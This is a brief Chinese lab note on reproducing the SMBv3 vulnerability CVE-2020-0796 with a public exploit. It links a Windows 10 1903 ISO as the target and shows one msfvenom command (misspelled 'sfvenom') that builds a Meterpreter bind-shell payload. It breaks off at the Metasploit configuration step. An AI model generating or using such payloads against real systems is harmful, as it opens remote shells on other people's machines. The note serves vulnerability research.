CVE-2020-0796 复现

看到 GitHub 上面有对应的 exp,就复现看看。

复现

靶机地址

1
ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/

使用 msf 生成对应 payload

1
sfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

使用 python3 运行脚本即可。

msf 配置